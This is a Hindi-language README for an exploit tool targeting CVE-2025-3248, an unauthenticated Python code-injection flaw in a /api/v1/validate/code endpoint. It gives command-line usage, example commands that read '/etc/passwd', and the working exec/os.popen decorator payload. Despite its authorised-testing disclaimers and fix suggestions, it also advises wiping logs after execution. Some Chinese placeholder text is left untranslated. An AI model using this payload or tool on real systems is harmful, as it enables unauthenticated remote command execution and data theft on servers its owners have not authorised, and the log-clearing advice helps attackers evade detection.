
CVE-2025-3248 के लिए शोषण: लक्ष्य सर्वर पर मनमाने कमांड निष्पादित करने के लिए एक अप्रमाणित API कोड एंडपॉइंट में क्राफ्टेड Python पेलोड इंजेक्ट करता है।
CVE-2025-3248 भेद्यता शोषण उपकरण दस्तावेज़
परिचय
यह उपकरण CVE-2025-3248 भेद्यता (Python-आधारित कोड इंजेक्शन भेद्यता) का शोषण करने के लिए है, दुर्भावनापूर्ण पेलोड बनाकर लक्ष्य सर्वर पर रिमोट कमांड निष्पादन (RCE) प्राप्त करने के लिए। यह भेद्यता किसी वेब एप्लिकेशन के API इंटरफ़ेस में मौजूद है, हमलावर एक अनियंत्रित कोड निष्पादन बिंदु का उपयोग करके मनमाना Python कोड इंजेक्ट कर सकता है।
महत्वपूर्ण सूचना:
यह उपकरण केवल अधिकृत सुरक्षा परीक्षण के लिए है, अनधिकृत पैठ परीक्षण कानून का उल्लंघन कर सकता है। कृपया सुनिश्चित करें कि आपके पास लक्ष्य प्रणाली का स्पष्ट प्राधिकरण है।
विशेषताएँ
✅ /api/v1/validate/code इंटरफ़ेस के माध्यम से दुर्भावनापूर्ण Python कोड इंजेक्ट करें
✅ मनमाने सिस्टम कमांड (जैसे whoami, ls आदि) निष्पादित करने का समर्थन करता है
✅ अनुकूलन योग्य टाइमआउट (डिफ़ॉल्ट 10 सेकंड)
✅ टेक्स्ट/JSON दो आउटपुट प्रारूपों का समर्थन करता है
✅ विस्तृत त्रुटि प्रबंधन और लॉग आउटपुट
उपयोग विधि
मूल सिंटैक्स
bash
संपादित करें
python cve-2025-3248.py -t <目标URL> -c "<命令>" [选项] पैरामीटर विवरण पैरामीटर आवश्यक विवरण -t, --target हाँ लक्ष्य URL (प्रारूप: http://ip:port) -c, --command हाँ निष्पादित किया जाने वाला सिस्टम कमांड (उद्धरण में लपेटा जाना चाहिए) -o, --output नहीं आउटपुट प्रारूप (text/json, डिफ़ॉल्ट text) --timeout नहीं अनुरोध टाइमआउट (सेकंड, डिफ़ॉल्ट 10) -v, --verbose नहीं विस्तृत निष्पादन लॉग दिखाएँ उपयोग उदाहरण उदाहरण 1: whoami कमांड निष्पादित करें (डिफ़ॉल्ट आउटपुट प्रारूप) bash
संपादित करें
python cve-2025-3248.py -t http://192.168.1.100:7860 -c "whoami" आउटपुट उदाहरण: टेक्स्ट
संपादित करें
उदाहरण 2: JSON प्रारूप आउटपुट + विस्तृत लॉग bash
संपादित करें
python cve-2025-3248.py -t https://app.example.com -c "cat /etc/passwd" -o json -v आउटपुट उदाहरण: json
संपादित करें
{
"status": 200,
"content": "root❌0:0:root:/root:/bin/bash\n...",
"success": true
}
भेद्यता सिद्धांत संक्षिप्त विश्लेषण
लक्ष्य सेवा /api/v1/validate/code इंटरफ़ेस में code पैरामीटर प्राप्त करती है
सर्वर-साइड इनपुट का सुरक्षा फ़िल्टर नहीं करता, सीधे exec() का उपयोग करके पारित Python कोड निष्पादित करता है
हमलावर विशेष पेलोड बनाता है:
python
संपादित करें
import os
@exec("raise Exception(os.popen('whoami').read())")
def f():
pass
अपवाद प्रबंधन तंत्र के माध्यम से os.popen() चालू करके सिस्टम कमांड निष्पादित करता है
भेद्यता जोखिम: यह भेद्यता सर्वर पर पूर्ण नियंत्रण का कारण बन सकती है, हमलावर मनमाने सिस्टम कमांड निष्पादित कर सकता है, संवेदनशील डेटा चुरा सकता है, बैकडोर स्थापित कर सकता है आदि।
सुरक्षा चेतावनी
⚠️ यह उपकरण केवल अधिकृत पैठ परीक्षण के लिए है ⚠️
कानूनी जोखिम: स्पष्ट प्राधिकरण के बिना इस उपकरण का उपयोग करके पैठ परीक्षण करना कंप्यूटर धोखाधड़ी और दुरुपयोग अधिनियम जैसे कानूनों का उल्लंघन कर सकता है
सिस्टम जोखिम: सिस्टम कमांड निष्पादित करने से सेवा क्रैश, डेटा हानि या सिस्टम डाउन हो सकता है
पहचान जोखिम: आक्रमण गतिविधियाँ फ़ायरवॉल, IDS/IPS द्वारा पहचानी और लॉग की जा सकती हैं
सुझाव:
केवल नियंत्रित वातावरण (जैसे प्रयोगशाला, अधिकृत परीक्षण वातावरण) में उपयोग करें
गलत संचालन से बचने के लिए -v पैरामीटर का उपयोग करके विस्तृत लॉग देखें
निष्पादन के तुरंत बाद निशान साफ़ करें (जैसे लॉग हटाना, सत्र बंद करना)
निर्भरता वातावरण
Python 3.7+
requests लाइब्रेरी (पहले से स्थापित होनी चाहिए)
bash
संपादित करें
pip install requests
त्रुटि प्रबंधन विवरण
त्रुटि कोड कारण समाधान
[-] लक्ष्य URL प्रारूप त्रुटि URL में scheme या host गायब है URL प्रारूप जाँचें (जैसे http://127.0.0.1:8080)
[-] अनुरोध टाइमआउट लक्ष्य प्रतिक्रिया समय समाप्त --timeout पैरामीटर मान बढ़ाएँ
[-] कनेक्शन त्रुटि लक्ष्य अप्राप्य/फ़ायरवॉल अवरोधन नेटवर्क कनेक्टिविटी जाँचें
[-] कमांड निष्पादन विफल HTTP स्थिति: 403 सर्वर-साइड अनुमति अस्वीकृत पुष्टि करें कि लक्ष्य सेवा कोड निष्पादन की अनुमति देती है
तकनीकी विवरण
भेद्यता स्थान: /api/v1/validate/code POST इंटरफ़ेस
भेद्यता प्रकार: कोड इंजेक्शन (Code Injection)
प्रभावित संस्करण: निर्दिष्ट नहीं (स्क्रिप्ट मानती है कि भेद्यता का संस्करण मौजूद है)
सुधार सुझाव:
इनपुट पर सख्त फ़िल्टरिंग लागू करें (exec/eval जैसे फ़ंक्शन प्रतिबंधित करें)
उपयोगकर्ता इनपुट कोड निष्पादित करने के लिए सैंडबॉक्स वातावरण का उपयोग करें
API इंटरफ़ेस के अनुमति दायरे को सीमित करें
अस्वीकरण:
यह दस्तावेज़ केवल सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए है। लेखक इस उपकरण के उपयोग से होने वाली किसी भी प्रत्यक्ष या अप्रत्यक्ष हानि के लिए जिम्मेदार नहीं है। कृपया कानूनों और विनियमों का पालन करें, सुरक्षा उपकरणों का कानूनी रूप से उपयोग करें।